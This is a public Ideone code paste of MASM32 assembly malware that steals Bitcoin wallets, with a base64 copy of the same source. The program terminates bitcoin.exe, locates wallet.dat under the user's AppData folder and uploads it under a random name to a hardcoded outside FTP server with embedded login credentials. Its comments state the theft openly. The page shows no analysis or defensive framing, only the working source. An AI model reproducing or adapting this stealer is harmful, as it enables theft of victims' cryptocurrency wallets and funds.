Ideone.com

fork download

copy

include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib
 
FTPit        PROTO :DWORD,:DWORD,:DWORD
KillMe   PROTO :DWORD
Randomize  PROTO
Random   PROTO :DWORD
ThePort  equ     21
.data
  ftpsite       db "poutube.uni.me",0        ;change the server
  Username      db "zosi",0  ;change the username
  Password      db "g0dl1ke",0 ;change the password
  szTheVictim db "bitcoin.exe",0
  RandWallet    db "%s-wallet.dat",0
  AppData       db "AppData",0
  wallet db "%s\Bitcoin\wallet.dat",0
  random_seed   dd ?
  res    dd 0
  sFmt     db '%u',0
  sBuf     db 10 dup(0)
 
.data?
  buffer        db MAX_PATH dup(?)
 WalletPath     db 256  dup(?)
 WalletFTP      db 256  dup(?)
 szBuffer       db 256  dup(?)
.code
start:
 
 invoke  KillMe, addr szTheVictim      ;kill the bitcoin process
 invoke  Randomize        ;generate a random number
     invoke  Random,9999999
     mov     res,EAX
     invoke  wsprintf,ADDR sBuf,ADDR sFmt,res     ;append it to our ftp upload filename
 invoke  wsprintf,addr WalletFTP,addr RandWallet, addr sBuf   ;ex: 9586293-wallet.dat
 invoke  GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder
 invoke  wsprintf,addr WalletPath,addr wallet, addr buffer   ;append the bitcoin wallet
 invoke  FTPit, addr ftpsite, addr WalletPath,addr WalletFTP   ; send that shit to a public ftp
 invoke  ExitProcess, 0
 
FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
    local hInternet:DWORD
    local ftpHandle:DWORD
    local context:DWORD
    local InternetStatusCallback:DWORD
 invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
     mov hInternet, eax
 invoke InternetConnect,hInternet,FTPserver,ThePort ,\   ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
                      ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
                     INTERNET_FLAG_PASSIVE,ADDR context
     mov ftpHandle,eax
 invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
 invoke InternetCloseHandle,ftpHandle
 invoke InternetCloseHandle, hInternet
    ret
err:
 invoke GetErrDescription,eax
 ret
FTPit endp
 
Random proc dwBase:dword
  push    ebx  
  mov  eax,dwBase  
  xor  ebx,ebx  
  imul    edx,random_seed,08088405h  
  inc  edx  
  mov  random_seed,edx  
  mul  edx  
  mov  eax,edx  
  pop  ebx  
  ret
Random endp
Randomize proc  
  invoke  GetTickCount
  mov  random_seed,eax  
  ret
Randomize endp
KillMe proc szFile:dword
  LOCAL Process:PROCESSENTRY32
 mov Process.dwSize, sizeof Process
 invoke CreateToolhelp32Snapshot, 2, 0
  mov esi, eax
 invoke Process32First, esi, addr Process
 @@loop:    
    invoke lstrcmpiA,szFile, addr Process.szExeFile
  test eax, eax
  jnz @@continue
      invoke OpenProcess, 0001h, 0, Process.th32ProcessID
      invoke TerminateProcess, eax, 0
 @@continue:
      invoke Process32Next, esi, addr Process
  test eax, eax
  jz @@done
      jmp @@loop
 @@done:
  invoke CloseHandle, esi
  ret
KillMe endp
 
end start
û

aW5jbHVkZSBcbWFzbTMyXGluY2x1ZGVcbWFzbTMycnQuaW5jCmluY2x1ZGUgXG1hc20zMlxpbmNsdWRlXHdpbmluZXQuaW5jCmluY2x1ZGVsaWIgXG1hc20zMlxsaWJcd2luaW5ldC5saWIKIApGVFBpdCAgICAgICAgUFJPVE8gOkRXT1JELDpEV09SRCw6RFdPUkQKS2lsbE1lICAgUFJPVE8gOkRXT1JEClJhbmRvbWl6ZSAgUFJPVE8KUmFuZG9tICAgUFJPVE8gOkRXT1JEClRoZVBvcnQgIGVxdSAgICAgMjEKLmRhdGEKICBmdHBzaXRlICAgICAgIGRiICJwb3V0dWJlLnVuaS5tZSIsMCAgICAgICAgO2NoYW5nZSB0aGUgc2VydmVyCiAgVXNlcm5hbWUgICAgICBkYiAiem9zaSIsMCAgO2NoYW5nZSB0aGUgdXNlcm5hbWUKICBQYXNzd29yZCAgICAgIGRiICJnMGRsMWtlIiwwIDtjaGFuZ2UgdGhlIHBhc3N3b3JkCiAgc3pUaGVWaWN0aW0gZGIgImJpdGNvaW4uZXhlIiwwCiAgUmFuZFdhbGxldCAgICBkYiAiJXMtd2FsbGV0LmRhdCIsMAogIEFwcERhdGEgICAgICAgZGIgIkFwcERhdGEiLDAKICB3YWxsZXQgZGIgIiVzXEJpdGNvaW5cd2FsbGV0LmRhdCIsMAogIHJhbmRvbV9zZWVkICAgZGQgPwogIHJlcyAgICBkZCAwCiAgc0ZtdCAgICAgZGIgJyV1JywwCiAgc0J1ZiAgICAgZGIgMTAgZHVwKDApCiAKLmRhdGE/CiAgYnVmZmVyICAgICAgICBkYiBNQVhfUEFUSCBkdXAoPykKIFdhbGxldFBhdGggICAgIGRiIDI1NiAgZHVwKD8pCiBXYWxsZXRGVFAgICAgICBkYiAyNTYgIGR1cCg/KQogc3pCdWZmZXIgICAgICAgZGIgMjU2ICBkdXAoPykKLmNvZGUKc3RhcnQ6CiAgICAgICAgIAogaW52b2tlICBLaWxsTWUsIGFkZHIgc3pUaGVWaWN0aW0gICAgICA7a2lsbCB0aGUgYml0Y29pbiBwcm9jZXNzCiBpbnZva2UgIFJhbmRvbWl6ZSAgICAgICAgO2dlbmVyYXRlIGEgcmFuZG9tIG51bWJlcgogICAgIGludm9rZSAgUmFuZG9tLDk5OTk5OTkKICAgICBtb3YgICAgIHJlcyxFQVgKICAgICBpbnZva2UgIHdzcHJpbnRmLEFERFIgc0J1ZixBRERSIHNGbXQscmVzICAgICA7YXBwZW5kIGl0IHRvIG91ciBmdHAgdXBsb2FkIGZpbGVuYW1lCiBpbnZva2UgIHdzcHJpbnRmLGFkZHIgV2FsbGV0RlRQLGFkZHIgUmFuZFdhbGxldCwgYWRkciBzQnVmICAgO2V4OiA5NTg2MjkzLXdhbGxldC5kYXQKIGludm9rZSAgR2V0RW52aXJvbm1lbnRWYXJpYWJsZSwgYWRkciBBcHBEYXRhLCBhZGRyIGJ1ZmZlciwgc2l6ZW9mIGJ1ZmZlciA7Z2V0IHRoZSAlQXBwREFUQSUgZm9sZGVyCiBpbnZva2UgIHdzcHJpbnRmLGFkZHIgV2FsbGV0UGF0aCxhZGRyIHdhbGxldCwgYWRkciBidWZmZXIgICA7YXBwZW5kIHRoZSBiaXRjb2luIHdhbGxldAogaW52b2tlICBGVFBpdCwgYWRkciBmdHBzaXRlLCBhZGRyIFdhbGxldFBhdGgsYWRkciBXYWxsZXRGVFAgICA7IHNlbmQgdGhhdCBzaGl0IHRvIGEgcHVibGljIGZ0cAogaW52b2tlICBFeGl0UHJvY2VzcywgMAogCkZUUGl0IFBST0MgRlRQc2VydmVyOkRXT1JELCBscHN6RmlsZTpEV09SRCwgbHBSZW1vdGVGaWxlOkRXT1JECiAgICBsb2NhbCBoSW50ZXJuZXQ6RFdPUkQKICAgIGxvY2FsIGZ0cEhhbmRsZTpEV09SRAogICAgbG9jYWwgY29udGV4dDpEV09SRAogICAgbG9jYWwgSW50ZXJuZXRTdGF0dXNDYWxsYmFjazpEV09SRAogaW52b2tlIEludGVybmV0T3BlbixOVUxMLElOVEVSTkVUX09QRU5fVFlQRV9QUkVDT05GSUcsTlVMTCxOVUxMLDAKICAgICBtb3YgaEludGVybmV0LCBlYXgKIGludm9rZSBJbnRlcm5ldENvbm5lY3QsaEludGVybmV0LEZUUHNlcnZlcixUaGVQb3J0ICxcICAgO2lmIGRpZmZlcmVudCBwb3J0IGNoYW5nZSBJTlRFUk5FVF9ERUZBVUxUX0ZUUF9QT1JUIHRvIHBvcnQgIwogICAgICAgICAgICAgICAgICAgICAgQUREUiBVc2VybmFtZSxBRERSIFBhc3N3b3JkLElOVEVSTkVUX1NFUlZJQ0VfRlRQLFwKICAgICAgICAgICAgICAgICAgICAgSU5URVJORVRfRkxBR19QQVNTSVZFLEFERFIgY29udGV4dAogICAgIG1vdiBmdHBIYW5kbGUsZWF4CiBpbnZva2UgRnRwUHV0RmlsZSxmdHBIYW5kbGUsbHBzekZpbGUsbHBSZW1vdGVGaWxlLEZUUF9UUkFOU0ZFUl9UWVBFX0JJTkFSWSxOVUxMCiBpbnZva2UgSW50ZXJuZXRDbG9zZUhhbmRsZSxmdHBIYW5kbGUKIGludm9rZSBJbnRlcm5ldENsb3NlSGFuZGxlLCBoSW50ZXJuZXQKICAgIHJldAplcnI6CiBpbnZva2UgR2V0RXJyRGVzY3JpcHRpb24sZWF4CiByZXQKRlRQaXQgZW5kcAogClJhbmRvbSBwcm9jIGR3QmFzZTpkd29yZAogIHB1c2ggICAgZWJ4ICAKICBtb3YgIGVheCxkd0Jhc2UgIAogIHhvciAgZWJ4LGVieCAgCiAgaW11bCAgICBlZHgscmFuZG9tX3NlZWQsMDgwODg0MDVoICAKICBpbmMgIGVkeCAgCiAgbW92ICByYW5kb21fc2VlZCxlZHggIAogIG11bCAgZWR4ICAKICBtb3YgIGVheCxlZHggIAogIHBvcCAgZWJ4ICAKICByZXQKUmFuZG9tIGVuZHAKUmFuZG9taXplIHByb2MgIAogIGludm9rZSAgR2V0VGlja0NvdW50CiAgbW92ICByYW5kb21fc2VlZCxlYXggIAogIHJldApSYW5kb21pemUgZW5kcApLaWxsTWUgcHJvYyBzekZpbGU6ZHdvcmQKICBMT0NBTCBQcm9jZXNzOlBST0NFU1NFTlRSWTMyCiBtb3YgUHJvY2Vzcy5kd1NpemUsIHNpemVvZiBQcm9jZXNzCiBpbnZva2UgQ3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90LCAyLCAwCiAgbW92IGVzaSwgZWF4CiBpbnZva2UgUHJvY2VzczMyRmlyc3QsIGVzaSwgYWRkciBQcm9jZXNzCiBAQGxvb3A6ICAgIAogICAgaW52b2tlIGxzdHJjbXBpQSxzekZpbGUsIGFkZHIgUHJvY2Vzcy5zekV4ZUZpbGUKICB0ZXN0IGVheCwgZWF4CiAgam56IEBAY29udGludWUKICAgICAgaW52b2tlIE9wZW5Qcm9jZXNzLCAwMDAxaCwgMCwgUHJvY2Vzcy50aDMyUHJvY2Vzc0lECiAgICAgIGludm9rZSBUZXJtaW5hdGVQcm9jZXNzLCBlYXgsIDAKIEBAY29udGludWU6CiAgICAgIGludm9rZSBQcm9jZXNzMzJOZXh0LCBlc2ksIGFkZHIgUHJvY2VzcwogIHRlc3QgZWF4LCBlYXgKICBqeiBAQGRvbmUKICAgICAgam1wIEBAbG9vcAogQEBkb25lOgogIGludm9rZSBDbG9zZUhhbmRsZSwgZXNpCiAgcmV0CktpbGxNZSBlbmRwCiAKZW5kIHN0YXJ0CsO7

Success #stdin #stdout 0.01s 5296KB

stdin

copy

Standard input is empty

stdout

copy

������������

https://ideone.com/wZOLQ0

language:

Brainf**k (bff 1.0.6)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language